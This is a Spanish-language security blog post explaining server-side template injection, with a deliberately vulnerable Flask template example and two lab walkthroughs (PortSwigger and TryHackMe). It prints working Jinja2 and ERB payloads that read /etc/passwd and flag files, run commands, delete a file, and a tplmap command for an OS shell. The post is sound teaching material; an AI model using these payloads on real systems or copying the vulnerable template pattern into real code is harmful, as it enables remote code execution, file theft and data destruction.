<!DOCTYPE html><html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="Queremos seguir aprendiendo y compartir nuestra passion por la Ciberseguridad"><meta name="theme-color" content="#2d4356"><meta name="baidu-site-verification"><title>Server-side template injection | ShadowDC</title><link rel="stylesheet" type="text/css" href="/css/style.css"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.png"><link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script><meta name="generator" content="Hexo 4.2.1"></head><link rel="stylesheet" type="text/css" href="/plugins/prettify/doxy.css"><script type="text/javascript" src="/js/ready.js" async></script><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css"><body class="night"><div class="mobile-head" id="mobile-head"><div class="navbar-icon"><span></span><span></span><span></span></div><div class="navbar-title"><a href="/">LITREILY</a></div><div class="navbar-search"><!--= show a circle here--></div></div><div class="h-wrapper" id="menu"><nav class="h-head box"><div class="m-hdimg"><a class="hdimg img" href="/"><img class="nofancybox" src="/img/profile.jpg" width="128" height="128"></a><h1 class="ttl"><a href="/">ShadowDC</a></h1></div><p class="m-desc">心之所向，无惧无悔,<br>愿求仁得仁，复无怨怼！</p><div class="m-nav"><ul><li><span class="dot">●</span><a href="/archives/">归档</a></li><li><span class="dot">●</span><a href="/categories/">分类</a></li><li><span class="dot">●</span><a href="/tags/">标签</a></li><li><span class="dot">●</span><a href="/about/">关于</a></li><li><span class="dot">●</span><a href="/atom.xml">RSS</a></li><li class="m-sch"><form class="form" id="j-formsch" method="get"><input class="txt" type="text" id="local-search-input" name="q" value="搜索" onfocus="if(this.value=='搜索'){this.value='';}" onblur="if(this.value==''){this.value='搜索';}"><input type="text" style="display:none;"></form></li></ul><div id="local-search-result"></div></div></nav></div><div id="back2Top"><a class="fa fa-arrow-up" title="Back to top" href="#"></a></div><div class="box" id="container"><div class="l-wrapper"><div class="l-content box"><div class="l-post l-post-art"><article class="p-art"><div class="p-header box"><h1 class="p-title">Server-side template injection</h1><div class="p-info"><span class="p-date"><i class="fa fa-calendar"></i><a href="/2020/07/08/SSTI/">2020-07-08</a></span><span class="p-category"><i class="fa fa-folder"></i><a href="/categories/SSTI/">SSTI</a>&nbsp;&bull;&nbsp;<a href="/categories/SSTI/Linux/">Linux</a>&nbsp;&bull;&nbsp;<a href="/categories/SSTI/Linux/Hacking-Web/">Hacking Web</a>&nbsp;&bull;&nbsp;<a href="/categories/SSTI/Linux/Hacking-Web/RCE/">RCE</a>&nbsp;&bull;&nbsp;<a href="/categories/SSTI/Linux/Hacking-Web/RCE/LFI/">LFI</a>&nbsp;&bull;&nbsp;<a href="/categories/SSTI/Linux/Hacking-Web/RCE/LFI/THM/">THM</a>&nbsp;&bull;&nbsp;<a href="/categories/SSTI/Linux/Hacking-Web/RCE/LFI/THM/PortSwigger/">PortSwigger</a></span><span class="p-view" id="busuanzi_container_page_pv"><i class="fa fa-eye"></i><span id="busuanzi_value_page_pv"></span></span></div></div><div class="p-content"><h1><a href="#ssti" class="header-anchor">#</a><span id="ssti">SSTI</span></h1><p><img src="https://i.imgur.com/Q2sEwHS.png" alt></p>
<h2><a href="#que-es-stti" class="header-anchor">#</a><span id="que-es-stti">Que és STTI</span></h2><p>Sus siglas significan “Server Side Template Injection”, y lo que ocurre en esta vulnerabilidad es cuando una pagina web es dinámica i se habilita introducir datos hacia paginas web o emails. Eso permite el atacante introducir una plantilla y así habilitar la inyección al lado del servidor. Eso es bastante fácil de confundir con el Cross-Site Scripting (XSS) o simplemente omitirlo.<br>A diferencia del XXS, la inyección de plantillas se puede utilizar para atacar directamente los componentes internos de los servidores web y a menudo obtener una ejecución remota (RCE), eso se convierte en un punto potencial para hacer el pivoting.</p>
<p>Ejemplo de código, vemos que pregunta un nombre en un formulario y después contesta con un Hello (nombre introducido).</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">template = """</span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span>&gt;</span><span class="tag">&lt;<span class="name">html</span>&gt;</span><span class="tag">&lt;<span class="name">body</span>&gt;</span>\</span><br><span class="line">	<span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">"/"</span> <span class="attr">method</span>=<span class="string">"post"</span>&gt;</span>\</span><br><span class="line">		What is 2+2:<span class="tag">&lt;<span class="name">br</span>&gt;</span>\</span><br><span class="line">		<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"name"</span> <span class="attr">value</span>=<span class="string">""</span>&gt;</span>\</span><br><span class="line">		<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"sumbit"</span> <span class="attr">value</span>=<span class="string">"Submit"</span>&gt;</span>\</span><br><span class="line">	<span class="tag">&lt;/<span class="name">form</span>&gt;</span><span class="tag">&lt;<span class="name">h2</span>&gt;</span>%s! <span class="tag">&lt;/<span class="name">h2</span>&gt;</span><span class="tag">&lt;/<span class="name">body</span>&gt;</span><span class="tag">&lt;/<span class="name">html</span>&gt;</span>""" %user_input</span><br><span class="line"></span><br><span class="line">return render_template_string(template)</span><br></pre></td></tr></table></figure>


<h2><a href="#identificacion" class="header-anchor">#</a><span id="identificacion">Identificación</span></h2><p>Lo primero que se tiene que hacer es comprobar és intrucciones en texto plano, existen varias plantillas distintas y se tiene que identificar el payload correspondiente. Las expressiones más comunes són: </p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Var puede ser un calculo como &#123;&#123;20+1&#125;&#125; o &#123;&#123;3*'7'&#125;&#125;</span><br><span class="line">&#123;var&#125; $&#123;var&#125; <span class="tag">&lt;<span class="name">%=</span> <span class="attr">var</span> %&gt;</span> [% var %]</span><br></pre></td></tr></table></figure>
<p>Si utilizamos el mismo ejemplo anterior y la respuesta és:</p>
<blockquote>
<p> 21</p>
</blockquote>
<p><img src="https://i.imgur.com/oXbEo2D.png" alt></p>
<p>Eso significa que hemos encontrado el SSTI. Para seguir podemos buscar los payloads para la ejecucion de comandos, lo he sacado de <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#read-remote-file" target="_blank" rel="noopener">PayloadsAllTheThings</a>.</p>
<h2><a href="#explotacion" class="header-anchor">#</a><span id="explotacion">Explotación</span></h2><p>Para leer contenido podemos utilizar,  con esto tendriamos un LFI. </p>
<figure class="highlight django"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="template-variable">&#123;&#123; config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() &#125;&#125;</span></span><br></pre></td></tr></table></figure>

<p>Si queremos ejecucion de codigo podemos utilizar</p>
<figure class="highlight django"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="template-variable">&#123;&#123;config.__class__.__init__.__globals__['os'].popen(cat /etc/passwd).read()&#125;&#125;</span></span><br></pre></td></tr></table></figure>


<p>Existe un script en python que sirve para hacer una explotacion automàtica, es <a href="https://github.com/epinna/tplmap" target="_blank" rel="noopener">tplmap</a> y la sintaxis bàsica és:</p>
<h2><a href="#ejemplos" class="header-anchor">#</a><span id="ejemplos">Ejemplos</span></h2><h3><a href="#reto-1-basic-portswigger" class="header-anchor">#</a><span id="reto-1-basic-portswigger">Reto 1 - Basic PortSwigger</span></h3><p>Este ejemplo es en una lab de <a href="https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic" target="_blank" rel="noopener">https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic</a><br>A primera vista no vemos nada fuera de lo commun.<br><img src="https://i.imgur.com/IG7X5Eh.png" alt><br>Pero si le damos a <code>View details</code> al primer producto podemos ver que nos devuelve un mensage en tipo post.</p>
<p>URL : </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;ac7d1f211fbf166080f8360700e500b5.web-security-academy.net&#x2F;?message&#x3D;Unfortunately%20this%20product%20is%20out%20of%20stock</span><br></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/R0PYdBn.png" alt><br>Parece que podemos modificar el texto pero no ejecuta lo que hemos hecho anteriormente. Con este payload logramos que nos debuelba un message de error.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?message&#x3D;&lt;%&#x3D; 20+1%&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/JJ4IzIC.png" alt></p>
<p>Una vez identificado la inyeccion vamos a probar de hacer primero el RCE.<br>Lo podemos hacer con los siguientes payloads:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;%&#x3D; system(&#39;cat &#x2F;etc&#x2F;passwd&#39;) %&gt;</span><br><span class="line">&lt;%&#x3D; &#96;ls &#x2F;&#96; %&gt;</span><br><span class="line">&lt;%&#x3D; IO.popen(&#39;ls &#x2F;&#39;).readlines()  %&gt;</span><br><span class="line">&lt;% require &#39;open3&#39; %&gt;&lt;% @a,@b,@c,@d&#x3D;Open3.popen3(&#39;whoami&#39;) %&gt;&lt;%&#x3D; @b.readline()%&gt;</span><br><span class="line">&lt;% require &#39;open4&#39; %&gt;&lt;% @a,@b,@c,@d&#x3D;Open4.popen4(&#39;whoami&#39;) %&gt;&lt;%&#x3D; @c.readline()%&gt;</span><br></pre></td></tr></table></figure>
<p>El payload que utilizo en html encoded. </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">message&#x3D;%3C%&#x3D;%20&#96;id&#96;%20%%3E</span><br></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/LDdj8n3.png" alt></p>
<p>Ahora seguimos con el objetivo: </p>
<p><img src="https://i.imgur.com/xs20tLY.png" alt></p>
<p>Asi que con el payload siguiente lo completamos.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">message&#x3D;%3C%&#x3D;%20&#96;rm%20&#x2F;home&#x2F;carlos&#x2F;morale.txt&#96;%20%%3E</span><br></pre></td></tr></table></figure>

<p>Y completamos la lab. </p>
<p><img src="https://i.imgur.com/l7eRhjL.png" alt></p>
<h3><a href="#reto-2-tryhackme" class="header-anchor">#</a><span id="reto-2-tryhackme">Reto 2 - TryHackMe</span></h3><p>És el que he utilizado como ejemplo asi que ya identificamos que és una plantilla jinja2. Asi que podemos utilizar los siguientes payloads para comprovarlo. </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;4*4&#125;&#125;[[5*5]]</span><br><span class="line">&#123;&#123;7*&#39;7&#39;&#125;&#125; would result in 7777777</span><br><span class="line">&#123;&#123;config.items()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>Ahora vamos a probar de leer la flag. </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># Ejecucion mediante curl </span><br><span class="line">curl -X POST -d &#39;name&#x3D;%7B%7Bconfig.__class__.__init__.__globals__%5B%27os%27%5D.popen%28%27cat+%2Fflag%27%29.read%28%29%7D%7D&#39; http:&#x2F;&#x2F;10.10.171.251&#x2F;</span><br></pre></td></tr></table></figure>
<p>Output</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;body&gt;    &lt;form action&#x3D;&quot;&#x2F;&quot; method&#x3D;&quot;post&quot;&gt;      What&#39;s 2+2&lt;br&gt;      &lt;input type&#x3D;&quot;text&quot; name&#x3D;&quot;name&quot; value&#x3D;&quot;&quot;&gt;      &lt;input type&#x3D;&quot;submit&quot; value&#x3D;&quot;Submit&quot;&gt;    &lt;&#x2F;form&gt;&lt;p&gt;cooctus</span><br><span class="line">&lt;&#x2F;p&gt;&lt;&#x2F;body&gt;&lt;&#x2F;html&gt;%</span><br></pre></td></tr></table></figure>

<p>Lo interessante seria obtener un shell, eso lo podemos hacer con el tlpmap. Para ello debemos inicarle el siguiente comando.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tplmap.py -u http:&#x2F;&#x2F;10.10.171.251 -d &#39;name&#39; --os-shell -e Jinja2</span><br></pre></td></tr></table></figure>


<p><strong>Labs para practicar</strong> :<br><a href="https://github.com/s4n7h0/xvwa" target="_blank" rel="noopener">https://github.com/s4n7h0/xvwa</a><br><a href="https://portswigger.net/web-security/server-side-template-injection/exploiting" target="_blank" rel="noopener">https://portswigger.net/web-security/server-side-template-injection/exploiting</a></p>
<p><strong>Referencias</strong>:<br><a href="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection" target="_blank" rel="noopener">https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection</a><br><a href="https://portswigger.net/research/server-side-template-injection" target="_blank" rel="noopener">https://portswigger.net/research/server-side-template-injection</a><br><a href="https://tryhackme.com/room/zthobscurewebvulns" target="_blank" rel="noopener">https://tryhackme.com/room/zthobscurewebvulns</a></p>
</div><div class="p-copyright"><blockquote><div class="p-copyright-author"><span class="p-copyright-key">本文作者：</span><span class="p-copytight-value"><a href="mailto:litreily@163.com">J4ck21</a></span></div><div class="p-copyright-link"><span class="p-copyright-key">本文链接：</span><span class="p-copytight-value"><a href="/2020/07/08/SSTI/">http://teamshadowdc.github.io/2020/07/08/SSTI/</a></span></div><div class="p-copyright-note"><span class="p-copyright-key">版权声明：</span><span class="p-copytight-value">本博客所有文章除特殊声明外，均采用<a rel="nofollow" target="_blank" href="https://creativecommons.org/licenses/by-nc/4.0/"> CC BY-NC 4.0 </a>许可协议。转载请注明出处 <a href="http://teamshadowdc.github.io">J4ck21的博客</a>！</span></div></blockquote></div></article><div class="p-info box"></div><aside id="toc"><div class="toc-title">目录</div><nav><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#"><span class="toc-number">1.</span> <span class="toc-text">SSTI</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#"><span class="toc-number">1.1.</span> <span class="toc-text">Que és STTI</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#"><span class="toc-number">1.2.</span> <span class="toc-text">Identificación</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#"><span class="toc-number">1.3.</span> <span class="toc-text">Explotación</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#"><span class="toc-number">1.4.</span> <span class="toc-text">Ejemplos</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#"><span class="toc-number">1.4.1.</span> <span class="toc-text">Reto 1 - Basic PortSwigger</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#"><span class="toc-number">1.4.2.</span> <span class="toc-text">Reto 2 - TryHackMe</span></a></li></ol></li></ol></li></ol></nav></aside></div><section class="p-ext"><div class="l-pager l-pager-dtl box"><a class="next" href="/2020/07/03/Hackeando-con-Docker/">Hackeando con Docker &gt;</a></div><div id="valine-comment"><style type="text/css">.night .v[data-class=v] a { color: #0F9FB4 !important; }
.night .v[data-class=v] a:hover { color: #216C73 !important; }
.night .v[data-class=v] li { list-style: inherit; }
.night .v[data-class=v] .vwrap { border: 1px solid #223441; border-radius: 0; }
.night .v[data-class=v] .vwrap:hover { box-shadow: 0 0 6px 1px #223441; }
.night .v[data-class=v] .vbtn { border-radius: 0; background: none; }
.night .v[data-class=v] .vlist .vcard .vh { border-bottom-color: #293D4E; }
.night .v[data-class=v] .vwrap .vheader .vinput { border-bottom-color: #223441; }
.night .v[data-class=v] .vwrap .vheader .vinput:focus { border-bottom-color: #339EB4; }
.night .v[data-class=v] code, .night .v[data-class=v] pre,.night .v[data-class=v] .vlist .vcard .vhead .vsys { background: #203240 !important; }
.night .v[data-class=v] code, .night .v[data-class=v] pre { color: #F0F0F0; font-size: 95%; }
.v[data-class=v] .vcards .vcard .vh {border-bottom-color: #223441; }
.night .v[data-class=v] .vcards .vcard .vcontent.expand:before {background: linear-gradient(180deg,rgba(38,57,73,.4),rgba(38,57,73,.9));}
.night .v[data-class=v] .vcards .vcard .vcontent.expand:after {background: rgba(38,57,73,.9)}
</style><div id="vcomment"></div><script src="//unpkg.com/valine@latest/dist/Valine.min.js"></script><script>var notify = 'false' == true ? true : false;
var verify = 'false' == true ? true : false;
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  appId:'',
  appKey:'',
  lang: 'zh-cn',
  placeholder:'ヾﾉ≧∀≦)o Come on, say something...',
  avatar:'identicon',
  guest_info:guest_info,
  pageSize:'10'
})</script></div></section><footer><p>Copyright © 2016 - 2020 <a href="/." rel="nofollow">ShadowDC</a> | <strong><a rel="nofollow" target="_blank" href="https://creativecommons.org/licenses/by-nc/4.0/">CC BY-NC 4.0</a></strong><br><span id="busuanzi_container_site_uv"><i class="fa fa-user"></i><span id="busuanzi_value_site_uv"></span></span> <span id="busuanzi_container_site_pv"><i class="fa fa-eye"></i><span id="busuanzi_value_site_pv"></span></span> | Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a>Theme with<a rel="nofollow" target="_blank" href="https://github.com/litreily/snark-hexo"> snark.</a></p></footer></div></div></div><script type="text/javascript" src="/plugins/prettify/prettify.js"></script><script type="text/javascript" src="/js/search.js"></script><script type="text/javascript" src="/js/top.js"></script><script type="text/javascript" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><script>var search_path = 'search.xml';
if (search_path.length == 0) {
    search_path = 'search.xml';
}
var path = '/' + search_path;
searchFunc(path, 'local-search-input', 'local-search-result');
</script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.1" async></script></body></html>